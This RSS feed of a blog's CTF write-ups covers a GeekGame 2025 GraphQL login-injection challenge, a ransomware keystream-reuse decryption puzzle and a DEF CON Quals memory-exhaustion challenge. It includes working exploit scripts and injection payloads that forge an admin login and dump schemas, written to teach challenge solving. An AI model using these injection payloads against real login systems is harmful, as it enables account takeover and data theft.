标签: writeup - ouuan's blog https://ouuan.moe/tag/writeup 标签为 writeup 的文章 - ouuan 的博客 Sun, 26 Oct 2025 04:32:03 GMT https://validator.w3.org/feed/docs/rss2.html https://github.com/jpmonette/feed zh-CN Copyright © 2022 - 2026 ouuan Licensed under CC BY-SA 4.0 <![CDATA[GeekGame 2025 出题人题解:统一身份认证、勒索病毒]]> https://ouuan.moe/post/2025/10/geekgame-2025-graphauth-ransomware https://ouuan.moe/post/2025/10/geekgame-2025-graphauth-ransomware Sun, 26 Oct 2025 04:32:03 GMT GeekGame 2025统一身份认证web-graphauth勒索病毒misc-ransomware的出题人题解

]]> GeekGame 2025统一身份认证web-graphauth勒索病毒misc-ransomware的出题人题解

统一身份认证

Flag 1

在登录和注册时直接将用户输入拼接在了 GraphQL 查询中用引号就可以闭合字符串进行注入

query = f'''
query ($username: String = "{username}", $password: String = "{password}") {{
  login(username: $username, password: $password) {{
    ok
    isAdmin
    username
  }}
}}
'''

攻击目标是返回 "login": { "ok": true, "isAdmin": true, "username": "xxx" }而查询中本来有的这个 login 没法篡改只能注入一个新的 login代码中检查 ok 时只需要 truthy 即可而检查 isAdmin 时写的是 == True所以必须是 true而能够返回 true 的除了 isAdmin 只有 ok通过 alias可以让返回值中的 isAdmin 字段放 ok 的值

query ($username: String = "username", $password: String = "password") {
  login(username: $username, password: $password) {
    ok
    isAdmin: ok
    username
  }") {
  login(username: $username, password: $password) {
    ok
    isAdmin
    username
  }
}

此时还需要处理掉查询语句中的 ") { 以及原有的这个 login") { 通过注释 # 就可以处理原有的 login 会造成重复而出错给一个 alias 就行

query ($username: String = "username", $password: String = "password") {
  login(username: $username, password: $password) {
    ok
    isAdmin: ok
    username
  }
  original: #") {
  login(username: $username, password: $password) {
    ok
    isAdmin
    username
  }
}

Flag 2

schema 是未知的要拿到 flag 就需要先获取 schemaGraphQL 提供了 introspection 功能可以通过 GraphQL query 来查询 schema

GraphQL introspection 有三个主要方法

  • 在任何地方都可以问 __typename 得到类型名
  • Query 可以问 __type(name: "Type") 获取特定类型的 schema
  • Query 可以问 __schema 获取整个 schema

通过 __schema { types { ... } } 就可以一次性获取整个 schema 中需要的信息

login: __schema {
  ok: __typename
  isAdmin: __typename
  username: types {
    name
    fields {
      name
      type {
        name
      }
    }
  }
}

而由于 flag 藏的不是特别深也可以一层层问下去

__type(name: "Secret") {
  ok: name
  isAdmin: name
  username: fields {
    name
    type {
      name
      fields {
        name
        type {
          name
          fields {
            name
            type {
              name
              fields {
                name
                type {
                  name
                  fields {
                    name
                    type {
                      name
                      fields {
                        name
                        type {
                          name
                          fields {
                            name
                            type {
                              name
                              fields {
                                name
                                type { name }
                              }
                            }
                          }
                        }
                      }
                    }
                  }
                }
              }
            }
          }
        }
      }
    }
  }
}

拿到 schema 之后就可以查询 flag 了利用 login 中的 username 进行回显需要给 okisAdmin 填东西ok 为 truthy如果都查 flag整个询问太长无法通过一开始的 256 长度限制但后来这个限制被放宽了所以就够了secret {{ ok: {query} isAdmin: {query} username: {query} }}

我有四种询问构造方法可以缩短长度

  • 可以使用 __typenamelogin: secret {{ ok: __typename isAdmin: __typename username: {query} }}

  • 实际上观察代码可以发现如果缺少 isAdmin 字段虽然会返回登录失败但此时 session['username'] 已赋值可以拿到回显所以不需要 isAdmin 字段login: secret {{ ok: {query} username: {query} }}

  • 可以使用 fragment 把重复的 flag 查询提取出来

    f'''
login: secret {{
    ok: secret_{xxx} {{ ... i }}
    isAdmin: secret_{xxx} {{ ... i }}
    username: secret_{xxx} {{ ... i }}
  }}
  ... l
}}
fragment i on Secret_{yyy} {{
  {inner_query}
}}
fragment l on Query {{
    x: #'''

  • 还可以找到最浅的叶子节点scalar value代替 flag 放到 okisAdmin根据 schema 的随机生成方式有 94% 的概率没算错的话payload 长度能在 256 以内如果你非常不幸可以重开题目

除了上面这些查询构造方法还可以在发送 payload 时同时利用 usernamepassword只不过由于 username 长度限制太小这个优化效果不大username",$password:String=""){login:#password\n{payload}x:#可以省下 ){login:另外把 object 放前面 scalar 放后面可以利用大括号省去一个空格

但这些都是我在开赛后发现有人被卡长度才想到的一开始根本没意识到这里会卡住

完整脚本这个是纯自动的包含上面提到的各种做法实际做不需要纯自动比如可以手动得到 flag 询问路径

from ast import literal_eval
from html import unescape
from http.cookies import SimpleCookie
import os
import re
import requests
import secrets

URL = os.environ.get('URL', 'http://localhost:5000')
COOKIE = os.environ.get('COOKIE', '')

cookie = SimpleCookie()
cookie.load(COOKIE)
session = requests.Session()
session.cookies.update({k: v.value for k, v in cookie.items()})


def register(username, password):
    res = session.post(
        f'{URL}/register',
        data={'username': username, 'password': password}
    )
    res.raise_for_status()


def login(username, password):
    print(f'{username = }')
    print(f'{password = }')
    res = session.post(
        f'{URL}/login',
        data={'username': username, 'password': password}
    )
    res.raise_for_status()
    return res.text


def sol1():
    username = secrets.token_hex(16)
    password = secrets.token_hex(16)
    register(username, password)

    payload = f'''{password}") {{
    login(username: $username, password: $password) {{
      ok
      isAdmin: ok
      username
    }}
    originalQuery:
    #'''

    print(login(username, payload))


def send(payload: str):
    payload = re.sub(r"\s+", ' ', payload)
    payload = re.sub(r"^ | $|(?<=\W) | (?=\W)", '', payload)
    # res = login('x', f'"){{login:{payload}x:#')
    res = login('",$password:String=""){login:#', f'\n{payload}x:#')
    username = re.search(r'用户名</strong>\s*<div>(.*?)</div>', res)
    assert username is not None
    return literal_eval(unescape(username.group(1)))


def introspection1():
    introspection = '''
    __schema {
      ok: __typename
      username: types {
        name
        fields {
          name
          type {
            name
          }
        }
      }
    }
    '''

    fields = {}

    types = send(introspection)

    for t in types:
        if t.get('fields') is None:
            continue
        fields[t['name']] = {}
        for f in t['fields']:
            fields[t['name']][f['name']] = f['type']['name']

    return fields


def introspection2():
    introspection = '''
    __type(name: "Secret") {
      ok: name
      username: fields {
        name
        type {
          name
          fields {
            name
            type {
              name
              fields {
                name
                type {
                  name
                  fields {
                    name
                    type {
                      name
                      fields {
                        name
                        type {
                          name
                          fields {
                            name
                            type {
                              name
                              fields {
                                name
                                type {
                                  name
                                  fields {
                                    name
                                    type { name }
                                  }
                                }
                              }
                            }
                          }
                        }
                      }
                    }
                  }
                }
              }
            }
          }
        }
      }
    }
    '''

    secret_fields = send(introspection)

    fields = {}

    def dfs(u):
        if u['name'] in fields or u.get('fields') is None:
            return
        fields[u['name']] = {}
        for f in u['fields']:
            fields[u['name']][f['name']] = f['type']['name']
            dfs(f['type'])

    dfs({'name': 'Secret', 'fields': secret_fields})

    return fields


def bfs(fields):
    path = {'Secret': '<SLOT>'}
    queue = ['Secret']

    while len(queue) > 0:
        u = queue.pop(0)
        if u not in fields:
            continue
        for f, v in fields[u].items():
            if v not in path:
                path[v] = path[u].replace('<SLOT>', f'{f}{{<SLOT>}}')
                queue.append(v)

    return path


def flag_query(fields, path):
    for u in fields:
        for f in fields[u]:
            if f == 'flag2':
                return path[u].replace('<SLOT>', f)


def get_short(fields):
    """shortest payload"""
    path = bfs(fields)
    query = flag_query(fields, path)
    res = send(f'secret {{ username: {query} ok: __typename }}')
    print(res)


def get_long(fields):
    """long payload"""
    path = bfs(fields)
    query = flag_query(fields, path)
    res = send(f'secret {{ ok: {query} isAdmin: {query} username: {query} }}')
    print(res)


def get1(fields):
    """use __typename"""
    path = bfs(fields)
    query = flag_query(fields, path)
    res = send(f'secret {{ ok: __typename isAdmin: __typename username: {query} }}')
    print(res)


def get2(fields):
    """omit isAdmin"""
    path = bfs(fields)
    query = flag_query(fields, path)
    res = send(f'secret {{ ok: {query} username: {query} }}')
    print(res)


def get3(fields):
    """use fragment"""

    path = bfs(fields)
    query = flag_query(fields, path)
    assert query is not None

    query_match = re.match(r'(\w+)\{(.*)\}', query)
    assert query_match is not None
    outer = query_match.group(1)
    inner = query_match.group(2)

    res = send(f'''secret {{
        ok: {outer} {{ ... i }}
        isAdmin: {outer} {{ ... i }}
        username: {outer} {{ ... i }}
      }}
      ... l
    }}
    fragment i on {fields["Secret"][outer]} {{
      {inner}
    }}
    fragment l on Query {{
    ''')

    print(res)


def get4(fields):
    """use shortest leaf"""

    path = bfs(fields)
    query = flag_query(fields, path)

    shortest = 'a' * 1000
    for u, p in path.items():
        if u not in fields:
            continue
        for f in fields[u]:
            if f.startswith('not_flag'):
                q = p.replace('<SLOT>', f)
                if len(q) < len(shortest):
                    shortest = q

    res = send(f'secret {{ ok: {shortest} isAdmin: {shortest} username: {query} }}')
    print(res)


def sol2():
    fields = introspection1()
    # fields = introspection2()

    get_short(fields)
    # get_long(fields)
    # get1(fields)
    # get2(fields)
    # get3(fields)
    # get4(fields)


def easter_egg():
    query = '''secret {
      ok: __typename
      username: not_part_of_challenge {
        selectOnePresetData(presetKey: "103765749452800", XH: "2025019999", KCH: "77777777") {
          XH KCH KSRQ XNXQ XF KCMC ZCJ
        }
      }
    }'''
    print(send(query))


sol1()

sol2()

easter_egg()

这个最短的 payload 只需要 130 字符的 password

username = '",$password:String=""){login:#'
password = '\n__schema{ok:__typename username:types{name fields{name type{name}}}}x:#'
username = '",$password:String=""){login:#'
password = '\nsecret{username:secret_EKFB{secret_BUNy{secret_3gjd{secret_695y{secret_DL6P{secret_A1NB{secret_r6H0{flag2}}}}}}}ok:__typename}x:#'

这题的 rate limit 主要是用来 ban 掉每次用 __type(name: "Secret_XXX") 只查一个类型的单层字段但如果你每问 200 次就重启一次容器理论上可以在数十小时内尝试成功

彩蛋

这题的 schema 中还有一个彩蛋本来发现它还比较困难但给了一个 secret.gql 示例其实就容易发现了但还是没人玩

type NotPartOfChallenge {
  selectOnePresetData(presetKey: String!, XH: String!, KCH: String!): Preset103765749452800
  formParser(status: String!, presetbind: String!, XH: String!, KCH: String!): Preset103765749452800
}

type Preset103765749452800 {
  msg: String
  status: String
  XH: String
  KCH: String
  KSRQ: String
  XNXQ: String
  XF: Int
  KCMC: String
  ZCJ: Int
}

THU 三字班以上的同学或许知道这是什么

{
  "selectOnePresetData": {
    "KCH": "77777777",
    "KCMC": "2025 “京华杯” 信息安全综合能力竞赛",
    "KSRQ": "20251024",
    "XF": 7,
    "XH": "2025019999",
    "XNXQ": "2025-2026-1",
    "ZCJ": -99
  }
}

勒索病毒

令人遗憾的是这题题面确实没有彩蛋

P.S. 题目背景仅供娱乐我不仅日常用 Linux甚至双系统的 Windows 坏了几个月一直懒得修

Flag 1

根据勒索信可以搜到关于 DoNex 的资料比如 decryptor以及 Cryptography is hard: Breaking the DoNex ransomware :: Recon 2024

漏洞很简单就是重用了流密码所以把已知明文对应的密文另一个密文异或在一起就能得到另一个明文被加密的文件中有上一届的 algo-gzip.py就有了已知明文

如果直接用 decryptor可能会提示解密不了这是因为长度不对而长度不对是因为被加密的文件是 CRLF而从 GitHub 下载的文件是 LF需要转换一下如果你注意力惊人或者在 Windows 上采用默认 Git 配置 checkout 文件而非从 GitHub 网页下载就能直接拿到 CRLF 的 algo-gzip.py而如果你是自己写的异或解密而不是用的现成的 decryptor没有先检查文件长度你就会发现解密出来开头是 This file contaiiZ#后面都是乱码此时结合 algo-gzip.py 第一行的长度只需要不惊人的注意力就能意识到可能是 CRLF 的问题

root = argv[1]

with open('algo-gzip.py', 'rb') as f:
    known = f.read()

with open(f'{root}/geekgame-4th/official_writeup/algo-gzip/attachment/algo-gzip.f58A66B51.py', 'rb') as f:
    known_encrypted = f.read()

with open(f'{root}/geekgame-5th/problemset/misc-ransomware/flag1-2-3.f58A66B51.txt', 'rb') as f:
    flags_encrypted = f.read()

flags_partial = bytes(a ^ b ^ c for a, b, c in zip(known, known_encrypted, flags_encrypted))
print(flags_partial)
flag1 = re.search(br'flag\{.+?\}', flags_partial).group(0).decode()
print(f'{flag1 = }\n')

Flag 2

algo-gzip.py 只提供了开头一段密钥继续解密需要更多的已知明文附件里有一个声称没有存储 flag 的 ZIP 文件而 ZIP 文件格式中很多信息会冗余存储所以可以从不完整的 ZIP 文件中恢复一些缺失的部分从 LFH 恢复 CDH 和 EOCD根据文件长度可以确定 ZIP 里没有第三个文件可以搜一篇教程或者看 APPNOTE.TXT 学习一下 ZIP 文件结构当然也可以让 AI 写或者用一些现成的工具

CDH 中有一些 LFH 没有的字段其中最难确定的是 external attributes但我特意让 flag 从这个字段开始如果设为 0 会得到 fl\xe1f{把它修复为 flag{后面也用相同的值就可以修复当然直接猜也是可以的考察第三人称单数的使用以及识别 ^T 是一个字符还是两个字符

from construct import Struct, Int32ul, Int16ul, Bytes, this

LFH_SIGNATURE = 0x04034b50
LocalFileHeader = Struct(
    "signature" / Int32ul,
    "version_needed" / Int16ul,
    "flags" / Int16ul,
    "compression" / Int16ul,
    "mod_time" / Int16ul,
    "mod_date" / Int16ul,
    "crc32" / Int32ul,
    "compressed_size" / Int32ul,
    "uncompressed_size" / Int32ul,
    "filename_length" / Int16ul,
    "extra_length" / Int16ul,
    "filename" / Bytes(this.filename_length),
    "extra" / Bytes(this.extra_length)
)

CDH_SIGNATURE = 0x02014b50
CentralDirHeader = Struct(
    "signature" / Int32ul,
    "version_made_by" / Int16ul,
    "version_needed" / Int16ul,
    "flags" / Int16ul,
    "compression" / Int16ul,
    "mod_time" / Int16ul,
    "mod_date" / Int16ul,
    "crc32" / Int32ul,
    "compressed_size" / Int32ul,
    "uncompressed_size" / Int32ul,
    "filename_length" / Int16ul,
    "extra_length" / Int16ul,
    "comment_length" / Int16ul,
    "disk_number_start" / Int16ul,
    "internal_attrs" / Int16ul,
    "external_attrs" / Int32ul,
    "local_header_offset" / Int32ul,
    "filename" / Bytes(this.filename_length),
    "extra" / Bytes(this.extra_length),
    "comment" / Bytes(this.comment_length)
)

EOCDR_SIGNATURE = 0x06054b50
Eocdr = Struct(
    "signature" / Int32ul,
    "disk_number" / Int16ul,
    "disk_start" / Int16ul,
    "disk_entries" / Int16ul,
    "total_entries" / Int16ul,
    "cd_size" / Int32ul,
    "cd_offset" / Int32ul,
    "comment_length" / Int16ul,
    "comment" / Bytes(this.comment_length)
)
zip_partial = bytes(a ^ b ^ c for a, b, c in zip(known, known_encrypted, zip_encrypted))
zip_io = BytesIO(zip_partial)

lfh1 = LocalFileHeader.parse_stream(zip_io)
assert lfh1 is not None
data1 = zip_io.read(lfh1.compressed_size)
offset2 = zip_io.tell()

lfh2 = LocalFileHeader.parse_stream(zip_io)
assert lfh2 is not None
data2_offset = zip_io.tell()
data2_head = zip_io.read()

zip_io.write(b'\0' * (lfh2.compressed_size - len(data2_head)))
cd_offset = zip_io.tell()

external_attrs = 0x1800000

cdh1 = CentralDirHeader.build(dict(
    signature=CDH_SIGNATURE,
    version_made_by=lfh1.version_needed,
    version_needed=lfh1.version_needed,
    flags=lfh1.flags,
    compression=lfh1.compression,
    mod_time=lfh1.mod_time,
    mod_date=lfh1.mod_date,
    crc32=lfh1.crc32,
    compressed_size=lfh1.compressed_size,
    uncompressed_size=lfh1.uncompressed_size,
    filename_length=lfh1.filename_length,
    extra_length=0,
    comment_length=0,
    disk_number_start=0,
    internal_attrs=0,
    external_attrs=external_attrs,
    local_header_offset=0,
    filename=lfh1.filename,
    extra=bytes(),
    comment=bytes(),
))
zip_io.write(cdh1)

cdh2 = CentralDirHeader.build(dict(
    signature=CDH_SIGNATURE,
    version_made_by=lfh2.version_needed,
    version_needed=lfh2.version_needed,
    flags=lfh2.flags,
    compression=lfh2.compression,
    mod_time=lfh2.mod_time,
    mod_date=lfh2.mod_date,
    crc32=lfh2.crc32,
    compressed_size=lfh2.compressed_size,
    uncompressed_size=lfh2.uncompressed_size,
    filename_length=lfh2.filename_length,
    extra_length=0,
    comment_length=0,
    disk_number_start=0,
    internal_attrs=0,
    external_attrs=external_attrs,
    local_header_offset=offset2,
    filename=lfh2.filename,
    extra=bytes(),
    comment=bytes(),
))
zip_io.write(cdh2)

eocdr = Eocdr.build(dict(
    signature=EOCDR_SIGNATURE,
    disk_number=0,
    disk_start=0,
    disk_entries=2,
    total_entries=2,
    cd_size=len(cdh1)+len(cdh2),
    cd_offset=cd_offset,
    comment_length=0,
    comment=bytes(),
))
zip_io.write(eocdr)

zip_io.seek(0)
zip_complete = zip_io.read()

flags_partial2 = bytes(a ^ b ^ c for a, b, c in zip(flags_encrypted, zip_encrypted, zip_complete))[cd_offset:]
print(flags_partial2)
flag2 = re.search(br'flag\{.+?\}', flags_partial2).group(0).decode()
print(f'{flag2 = }\n')

Flag 3

最后文件中未知的还有两段一段是压缩数据一段是超过 ZIP 文件长度的末尾显然只有前者是能破解的除非末尾的密钥能破解实际上我在 gen.py 里往后者塞了一个假 flag但这对结果其实没有任何影响

学习 DEFLATE 数据结构然后解析一下已知的开头部分可以发现它的动态 Huffman 树已经确定观察编码可以发现只有 6 个 literal 编码非零长度分别为 12341415而根据 ZIP 字段中记录的长度这个 DEFLATE 是把 30 字节的原数据编码成了约 90 字节从编码后长度中减去 DEFLATE header 的长度再考虑到最后一个 byte 可能有 1~8 个 bit可以得到编码数据减去末尾 EOB 的长度可能为 440~447如果数据中包含编码长度为 1~4 的 literal编码后长度就会小于 440而如果采用了 distance length pair则会更短因此数据中只可能包含编码长度为 1415 的 literal具体来说是 3~10 个编码长度为 14 的 literal剩下的为编码长度为 15 的 literal

于是数据的构成就基本确定了只需枚举 5.3×1075.3 \times 10^7 种排列组合而 ZIP 字段中提供了 CRC32 校验和可以用来校验哪个排列是正确的后来才想到除了 CRC32还可以根据 flag 都是 ASCII 可见字符来筛选这样有一些别的做法但可能还更麻烦

P.S. 感觉这题造 DEFLATE 编码以及对齐明文和 flag 的位置比做题难在思路已知的前提下

P.P.S. 各种排列组合的 CRC32 似乎都没有冲突如果是随机的 32bit 则会有大量重复我怀疑这是可以证明的但我不懂这个就造完数据后枚举一遍来保证唯一性了

deflate_info = parse_deflate_dynamic_header(data2_head, 3)

litlen_tree = deflate_info['litlen_tree']
l14 = 0
l15 = 0
c14 = (0, 0)
c15 = (0, 0)
eob_code = (0, 0)
print('literal codes:')
for code, sym in litlen_tree.items():
    if sym < 256:
        print(f'{sym}: {code}')
        if code[1] == 14:
            l14 = sym
            c14 = code
        elif code[1] == 15:
            l15 = sym
            c15 = code
    elif sym == 256:
        eob_code = code

n = lfh2.uncompressed_size
deflate_header_len = deflate_info['bits_consumed'] + 3
max_total_lit_len = lfh2.compressed_size * 8 - deflate_header_len - eob_code[1]
min_total_lit_len = max_total_lit_len - 7
all_15_len = 15 * n
print(f'{min_total_lit_len = }, {all_15_len = }')
min_14_count = all_15_len - max_total_lit_len
max_14_count = all_15_len - min_total_lit_len

for mask in tqdm(range(1 << n)):
    if not min_14_count <= mask.bit_count() <= max_14_count:
        continue
    data = bytes(l14 if (mask >> i) & 1 else l15 for i in range(n))
    if crc32(data) == lfh2.crc32:
        bits = BitWriter()
        bits.bytes.extend(data2_head[:deflate_header_len // 8])
        bits.bit_count = deflate_header_len % 8
        if bits.bit_count != 0:
            bits.current_byte = data2_head[deflate_header_len // 8] & ((1 << bits.bit_count) - 1)
        for i in range(n):
            code = c14 if (mask >> i) & 1 else c15
            bits.write_bits(*code)
        bits.write_bits(*eob_code)
        deflated = bits.get_bytes()
        flags_flag3 = bytes(a ^ b ^ c for a, b, c in zip(
            flags_encrypted[data2_offset:],
            zip_encrypted[data2_offset:],
            deflated,
        ))
        tqdm.write(str(flags_flag3))
        match = re.search(br'flag\{.+?\}', flags_flag3)
        if match is None:
            continue
        flag3 = match.group(0).decode()
        tqdm.write(f'{flag3 = }')
        break

DEFLATE header 的解析是纯 AI 写的

from typing import Tuple, Dict, List

class BitReader:
    def __init__(self, data: bytes, bitpos: int = 0):
        self.data = data
        self.bytepos = bitpos // 8
        self.bitpos = bitpos % 8  # 0..7, LSB-first within each byte (deflate)
        self.total_bits_read = bitpos

    def read_bits(self, n: int) -> int:
        """Read n bits (n <= 32) and return as integer (LSB-first)."""
        val = 0
        bits_read = 0
        while bits_read < n:
            if self.bytepos >= len(self.data):
                raise EOFError("Not enough data while reading bits")
            avail = 8 - self.bitpos
            take = min(n - bits_read, avail)
            current_byte = self.data[self.bytepos]
            # extract bits (LSB-first)
            chunk = (current_byte >> self.bitpos) & ((1 << take) - 1)
            val |= chunk << bits_read
            bits_read += take
            self.bitpos += take
            self.total_bits_read += take
            if self.bitpos == 8:
                self.bitpos = 0
                self.bytepos += 1
        return val

    def get_bitpos(self):
        return self.total_bits_read

class BitWriter:
    def __init__(self):
        self.bytes = bytearray()
        self.current_byte = 0
        self.bit_count = 0

    def write_bits(self, value: int, num_bits: int):
        for i in range(num_bits):
            bit = (value >> i) & 1
            self.current_byte |= bit << self.bit_count
            self.bit_count += 1

            if self.bit_count == 8:
                self.bytes.append(self.current_byte)
                self.current_byte = 0
                self.bit_count = 0

    def get_bytes(self) -> bytes:
        if self.bit_count > 0:
            self.bytes.append(self.current_byte)
        return bytes(self.bytes)

def reverse_bits(value: int, bitlen: int) -> int:
    """Reverse `bitlen` lowest bits of value."""
    rev = 0
    for _ in range(bitlen):
        rev = (rev << 1) | (value & 1)
        value >>= 1
    return rev

def build_canonical_huffman(code_lengths: List[int]) -> Tuple[Dict[Tuple[int,int], int], int]:
    """
    Build canonical Huffman mapping from symbol -> length to (code_rev, length) -> symbol,
    where code_rev is the integer value you'd get by reading bits LSB-first from the stream.
    Returns (mapping, max_length).
    mapping keys are (code_as_int_read_lsb_first, length) -> symbol
    """
    max_bits = max(code_lengths) if code_lengths else 0
    # Count of codes for each length
    bl_count = [0] * (max_bits + 1)
    for l in code_lengths:
        if l > 0:
            bl_count[l] += 1

    # Determine the first code for each length (canonical)
    next_code = [0] * (max_bits + 1)
    code = 0
    for bits in range(1, max_bits + 1):
        code = (code + bl_count[bits - 1]) << 1
        next_code[bits] = code

    mapping: Dict[Tuple[int,int], int] = {}
    for symbol, length in enumerate(code_lengths):
        if length != 0:
            assigned_code = next_code[length]
            next_code[length] += 1
            # canonical codes are MSB-first; but DEFLATE bitstream is LSB-first,
            # so reverse bits when storing for direct lookup of bit sequences read LSB-first.
            code_lsb_first = reverse_bits(assigned_code, length)
            mapping[(code_lsb_first, length)] = symbol

    return mapping, max_bits

# order of code length code lengths (RFC 1951 3.2.7)
CL_ORDER = [16,17,18,0,8,7,9,6,10,5,11,4,12,3,13,2,14,1,15]

def parse_deflate_dynamic_header(data: bytes, bitpos: int = 0):
    """
    Parse a dynamic Huffman header from a deflate stream starting at given bitpos.
    Returns (litlen_tree, dist_tree, bits_consumed, nlits, ndists, code_lengths) where:
      - litlen_tree and dist_tree: mapping (code_as_int_read_lsb_first, length) -> symbol
      - bits_consumed: number of bits consumed from the starting bitpos
      - nlits: number of literal/length codes (HLIT + 257)
      - ndists: number of distance codes (HDIST + 1)
      - code_lengths: combined list of literal+distance code lengths
    """
    br = BitReader(data, bitpos)

    HLIT = br.read_bits(5)      # number of literal/length codes - 257
    HDIST = br.read_bits(5)     # number of distance codes - 1
    HCLEN = br.read_bits(4)     # number of code length codes - 4

    nlits = HLIT + 257
    ndists = HDIST + 1
    nclen = HCLEN + 4

    # read code length code lengths (3 bits each) in CL_ORDER
    cl_code_lengths = [0] * 19
    for i in range(nclen):
        val = br.read_bits(3)
        cl_code_lengths[CL_ORDER[i]] = val

    # build Huffman for code-length alphabet (symbols 0..18)
    cl_mapping, cl_maxbits = build_canonical_huffman(cl_code_lengths)

    # helper to decode one symbol from a mapping
    def decode_symbol_from_mapping(reader: BitReader, mapping: Dict[Tuple[int,int], int], max_len: int) -> int:
        """Read up to max_len bits LSB-first trying to match a (code,length) key."""
        code = 0
        for length in range(1, max_len + 1):
            b = reader.read_bits(1)
            code |= (b << (length - 1))  # accumulate LSB-first
            key = (code, length)
            if key in mapping:
                return mapping[key]
        raise ValueError("No matching Huffman code found while decoding")

    # decode the code lengths for literal/length + distance alphabets
    total_codes = nlits + ndists
    code_lengths = []
    prev_len = 0
    while len(code_lengths) < total_codes:
        sym = decode_symbol_from_mapping(br, cl_mapping, cl_maxbits)
        if 0 <= sym <= 15:
            code_lengths.append(sym)
            prev_len = sym
        elif sym == 16:
            # copy previous length 3-6 times (2 extra bits)
            if len(code_lengths) == 0:
                raise ValueError("Code 16 with no previous length")
            repeat = br.read_bits(2) + 3
            code_lengths.extend([prev_len] * repeat)
        elif sym == 17:
            # repeat zero 3-10 times (3 extra bits)
            repeat = br.read_bits(3) + 3
            code_lengths.extend([0] * repeat)
            prev_len = 0
        elif sym == 18:
            # repeat zero 11-138 times (7 extra bits)
            repeat = br.read_bits(7) + 11
            code_lengths.extend([0] * repeat)
            prev_len = 0
        else:
            raise ValueError(f"Invalid symbol in code-length alphabet: {sym}")

        # guard: don't overflow total
        if len(code_lengths) > total_codes:
            # If the header is malformed we might read too many; trim and continue
            code_lengths = code_lengths[:total_codes]

    # split into literal/length and distance code length arrays
    litlen_lengths = code_lengths[:nlits]
    dist_lengths = code_lengths[nlits:nlits+ndists]

    # build canonical Huffman trees for literal/length and distance
    litlen_tree, litlen_max = build_canonical_huffman(litlen_lengths)
    dist_tree, dist_max = build_canonical_huffman(dist_lengths)

    bits_consumed = br.get_bitpos() - bitpos
    return {
        "litlen_tree": litlen_tree,
        "litlen_max_bits": litlen_max,
        "dist_tree": dist_tree,
        "dist_max_bits": dist_max,
        "bits_consumed": bits_consumed,
        "nlits": nlits,
        "ndists": ndists,
        "litlen_lengths": litlen_lengths,
        "dist_lengths": dist_lengths
    }

def decode_symbol_from_tree(reader: BitReader, tree: Dict[Tuple[int,int], int], max_len: int) -> int:
    """
    Decode a symbol from `reader` using the provided tree mapping produced by build_canonical_huffman.
    The reader will be advanced by the number of bits used.
    """
    code = 0
    for length in range(1, max_len + 1):
        b = reader.read_bits(1)
        code |= (b << (length - 1))
        key = (code, length)
        if key in tree:
            return tree[key]
    raise ValueError("No matching code in tree")

事故

非常抱歉计算 flag 1 放置位置的代码写挂了

我一直以为先交 2/3 的是在屯快到第二阶段才想到去检查一下附件也没注意 flag 提交记录里的半截 flag

这 Python 太坏了要是 Rust 早发现了

梗指南

这次我自己的两道题没什么梗除了稍微模仿了一下某电子身份服务系统但我参与了一些其他题面编写

其中千年讲堂的方形轮子 II缝了一些

  • 愛♡スクリ~ム! 的歌词不必多说本来想让 You 酱作为 あなた但不好缝
  • You 酱在最后一句差点说出了字真言但及时打住了这个还长得很像半个
  • You 酱的名字有渐变色这次的颜色比起第零届稍微调了一点适配了暗色模式
  • 黑客A.L.A.N中的A.L.A.N虹咲完结篇第二章 PV 里的角色
]]> writeup ctf <![CDATA[DEF CON CTF Quals 2025 memorybank Write-Up: Investigating V8 Garbage Collector]]> https://ouuan.moe/post/2025/04/memorybank https://ouuan.moe/post/2025/04/memorybank Sat, 10 May 2025 07:49:30 GMT Write-up for memorybank in DEF CON CTF Quals 2025. Particularly:

  • Why random username?
  • Why setTimeout?
  • Why large signature?
  • Why Uint8Array?
]]> Write-up for memorybank in DEF CON CTF Quals 2025. Particularly:

  • Why random username?
  • Why setTimeout?
  • Why large signature?
  • Why Uint8Array?

It is the most solved challenge in this event, surpassing the basic challenge 🐱‍💻🌐. However, I bet that most people did not fully understand how the solution worked, or why the alternatives did not.

(Un)fortunately, I did not try hard enough to guess different approaches and hit the correct one, but instead wasted my time figuring out the underlying mechanisms about the V8 garbage collector before getting the flag (and during writing this write-up).1

Heres the write-up. (My longest write-up for a single challenge, a most solved challenge :)

Solve the Challenge

In this challenge, we can log in to a bank system and withdraw bills. If we log in as the bank manager, we will get the flag.

The users are stored in an array of WeakRef, so we will be able to log in as the bank manager if the User object for the manager is not strongly referenced and reclaimed by the garbage collector.

Each withdrawn bill is stored as a Bill object including a signature field, which may occupy a substantial amount of memory. If we run out of available memory, we can trigger GC and the bank manager will hopefully be reclaimed.

There are two ways to occupy more memory:

  1. Make many bills.
  2. Make each bill large.

There is a list of valid options for the bill denomination, but the user input not actually checked, so we can get lots of bills be entering a small denomination like 1e-4 (0.0001).

There is no length limit on the signature input, so it can be very large.

Combining these two techniques, we can exhaust the available memory and cause garbage collections, which should remove the bank manager from the memory. So lets have a try.

from pwn import *

context.log_level = 'debug'

docker = 'docker run --rm -i -m 100m -v ./index.js:/index.js:ro denoland/deno'
deno = 'deno run --v8-flags=--trace-gc --allow-read /index.js'
p = process(f'{docker} {deno}', shell=True)

# login
p.sendlineafter(b'quit):', b'ouuan')

# large signature
p.sendlineafter(b'5):', b'3')
p.sendlineafter(b'bills):', b'a' * 10000)

# withdraw 1e4 bills
p.sendlineafter(b'5):', b'2')
p.sendlineafter(b'withdraw:', b'1')
p.sendlineafter(b'denomination:', b'1e-4')

# logout
p.sendlineafter(b'5):', b'4')

# login as bank manager
p.sendlineafter(b'quit):', b'bank_manager')
result = p.recvline().decode()
print(result)

# capture the flag
p.sendlineafter(b'6):', b'6')
p.interactive()

Oops, it does not work. We can even see GC logs from the --trace-gc flag, but the bank manager still exists.

1209 ms: Scavenge 6.8 (8.8) -> 6.9 (12.1) MB, pooled: 0 MB, 2.29 / 0.00 ms  (average mu = 1.000, current mu = 1.000) allocation failure;
1372 ms: Mark-Compact 8.4 (12.1) -> 8.2 (13.1) MB, pooled: 0 MB, 2.94 / 0.00 ms  (+ 0.5 ms in 0 steps since start of marking, biggest step 0.0 ms, walltime since start of marking 5 ms) (average mu = 0.997, current mu = 0.997) finalize incremental marking via stack guard; GC in old space requested

Are there anything else we can make use of? Wait, why does it allow us to use a random username?

        if (username.toLowerCase() === 'random') {
          username = `random-${crypto.randomUUID()}`;
        }

Lets see what will happen if we use a random username instead…

-p.sendlineafter(b'quit):', b'ouuan')
+p.sendlineafter(b'quit):', b'random')

Did it just print the flag?

If we read the code more carefully, we might not have an answer to the question above, but we may notice a strange part of the code:

  setTimeout(async () => {
    await user();
  }, 1000);

This makes no sense. Why do we need to waste one second here?

